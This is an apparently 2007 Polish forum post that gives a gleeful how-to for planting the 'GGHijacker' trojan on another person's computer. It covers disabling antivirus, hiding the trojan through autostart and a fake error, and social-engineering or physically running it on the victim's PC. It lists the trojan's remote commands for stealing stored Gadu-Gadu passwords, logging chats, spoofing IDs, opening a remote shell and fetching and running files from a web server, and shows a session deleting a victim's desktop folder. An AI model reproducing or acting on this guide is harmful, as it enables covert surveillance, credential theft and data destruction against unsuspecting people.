|
| Czy powinienem pisać więcej takich artykułów? Czy art był napisany w zrozumiały sposób, czy trudnym językiem? |
| Tak. Zrozumiały. |
|
50% |
[ 2 ] |
| Tak. Trudny język. |
|
0% |
[ 0 ] |
| Nie, nie obchodzą mnie rzeczy tego typu. Zrozumiały. |
|
50% |
[ 2 ] |
| Nie, nie obchodzą mnie rzeczy tego typu. Język trudny. |
|
0% |
[ 0 ] |
|
| Wszystkich Głosów : 4 |
|
| Autor |
Wiadomość |
OmfgWTFurDEAD
challenger
Dołączył: 06 Paź 2006
Posty: 44
Przeczytał: 0 tematów
Ostrzeżeń: 0/5
|
|
 Mały trik ;) |
|
Bawimy się czyimś GG!!
Autor Maciek (Shade)  Wszelkie prawa zastrzeżone etc 
Co nam będzie potrzebne??
-GGHijacker
-Najlepiej drugie GG, gdyż poprawnie działający Hijacker przeszkadza w rozmowach
Przygotowania:
Wchodzimy na [link widoczny dla zalogowanych] i ściągamy Hijackera. Jeśli link nie działa, to pisać a umieszcze nowego, bo po jakimś czasie się kasuje 
Bierzemy się do działania:
Wyłączamy antywirusa (ważne!!) i rozpakowujemy Hijackera, uruchamiamy go i mamy pare okienek.
Klient GG – tutaj wpisujemy numer GG, na które mają przychodzić rozmowy ofiary, oraz z którego będziemy sterować Hijackerem.
MSG Login – zaznaczamy ten kwadracik, jeśli chcemy podsłuchiwać rozmowy.
SPOOFED GG - tutaj podajemy 7 cyfrowy numer GG, pod który można podszyć się.
Wiadomości GG otrzymywane z numeru podanego w "CLIENT GG" będą
wyświetlane jako wiadomość od "SPOOFED GG" , działa to w dwie
strony tzn. każda wysłana wiadomość pod numer "SPOOFED GG"
zostanie przekierowana na numer "CLIENT GG".
Spoofing – zaznacz ten kwadracik, jeśli chcesz się podszywać pod numer wyżej napisany.
Autostart – tutaj wybieramy folder, gdzie Hijacker zainstaluje się na kompie ofiary, ja polecam Gadu-Gadu InstallPath gdyż wydaje mi się, iż antywirusy skanują foldery systemowe, a folderu GG nie ruszają.
Uruchamiaj razem z windows i ukryj w systemie – zaznaczamy oba, wtedy Hijacker odpali się przy każdym uruchomieniu kompa i ukryje się w systemie, przez co będzie trudniejszy do usunięcia.
Fake Error – tutaj możemy wpisać jakąś wiadomość. Na przykład mówimy ofierze, że plik to dodatek do GG. Wtedy w Fake Error wpisujemy np. Błąd!! Niewłaściwa wersja GG!! Co spowoduje, że gdy ofiara otworzy plik, wyświetli się taki właśnie błąd, podczas gdy Hijacker się zainstaluje. Ofiara nie będzie podejrzewała, że to jakiś syf, ale, że jest to po prostu nie działający dodatek do GG
ICON – możemy dać jakąś ikone naszemu Hijackerowi najlepiej ściągnąć Wojass Simple Binder z [link widoczny dla zalogowanych] gdyż jest tam zestaw przydatnych ikon
Generate – tworzy trojana.
Co z tym plikiem zrobić??
Gdy mamy już ten plik, trzeba go jakoś odpalić na kompie ofiary, można to zrobić grzecznie „Proszę, to dodatek do GG, przyda ci się” lub niegrzecznie, „hej, tak byłem w okolicy i pomyślałem, że wpadne, może przyniesiesz coś do picia??” po czym wkładamy dyskietke i odpalamy trojana ;d
Zaczyna się zabawa
Gdy ofiara zresetuje kompa, lub po prostu uruchomi ponownie, trojan będzie szalał Powinniśmy dostać wiadomośc tego typu (na numer podany jako Klient GG)
 |  | GGHijacker v2.0_beta
KOMPUTER: - x-7815e9b65d524
Login: - x
Adres IP: - 192.168.1.22 System: - WindowsXP - C:\WINDOWS
GG: C:\Program Files\Gadu-Gadu\gg.exe |
To akurat info o kompie jednej z ofiar
Wtedy wiemy, iż Hijacker działa poprawnie i żaden syfiasty antywir się do niego nie dobrał, a więc najlepiej sprawdzić jego działanie tak – wpisujemy ` (to cóś pod ESC), wtedy powinniśmy dostać wiadomość taką:
| | GGHijacker v.2.1 by Wojass
Polecenia
`info - informacje o systemie
`log - włącza logowanie rozmów
`log off - wyłącza logowanie rozmów
`spoof - włącza spoofing GG ID
`spoof off - wyłącza spoofing
`cmd - dostęp do linii poleceń CMD
`cmd off - kończy sesję CMD
`pass - wyciąga hasła GG (config.dat)
`download http://... - pobiera plik z serwera WWW
`update http://... - usuwa GGH, pobiera i uruchamia plik z serwera WWW
`uninstall - usuwa GGH z systemu
` - help |
no to jeśli ktoś zapisuje hasło w programie, to teraz wpisujemy `pass i wyświetla coś w stylu
| | < PROFIL: <nazwa> | GGID: <tu jest numer> | PASS: ***** >
< PROFIL: <nazwa> | GGID: <tu jest numer> | PASS: ***** > |
***** - tutaj normalnie widzimy hasło, ale ja go nie zamieściłem, gdyż nie chcę, aby powyższe numery ucierpiały a i tak pewnie zmieniły już hasła
jak nie chcemy dalej kogoś podsłuchiwać piszemy `log off i kuniec, albo `log i znowu widzimy rozmowy ;d tak samo wpisujemy `spoof żeby podszywać się pod numer podany jako spoof GG.
Ciekawą rzeczą jest `cmd wtedy mamy dostęp do wiersza poleceń, najlepiej wpisać wtedy help i wyświetlone zostaną najważniejsze komendy. Ciekawą rzeczą jest zrobienie czegoś takiego:
| | Ja
`cmd
Ofiara
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\x>
Ja
dir
Ofiara
dir
Wolumin w stacji C nie ma etykiety.
Numer seryjny woluminu: C008-F1B8
Katalog: C:\Documents and Settings\***
2007-05-19 22:15 <DIR> .
2007-05-19 22:15 <DIR> ..
2006-11-06 22:21 <DIR> .qt
2007-04-28 10:58 0 dxva_sig.txt
2007-05-11 16:22 <DIR> Gadu-Gadu
2006-11-05 14:07 <DIR> Menu Start
2007-05-21 16:36 <DIR> Moje dokumenty
2007-05-21 16:36 <DIR> Pulpit
2006-12-04 18:42 <DIR> Ulubione
2007-04-07 21:06 <DIR> WINDOWS
1 plik(ów) 0 bajtów
9 katalog(ów) 232 685 568 bajtów wolnych
Ja
del Pulpit
Ofiara
del Pulpit
C:\Documents and Settings\x>
Ja
Cd Pulpit
Ofiara
Cd Pupit
System nie może odnaleźć określonej ścieżki. |
No i ofiara ma czyściutki pulpit
Eksperymentuj dalej sam
Wstrzymam się od głosu w ankiecie
Post został pochwalony 0 razy
|
|
| Pon 16:50, 21 Maj 2007 |
 |
|
|
|
 |
|
|
Nie możesz pisać nowych tematów
Nie możesz odpowiadać w tematach
Nie możesz zmieniać swoich postów
Nie możesz usuwać swoich postów
Nie możesz głosować w ankietach
|
|
|
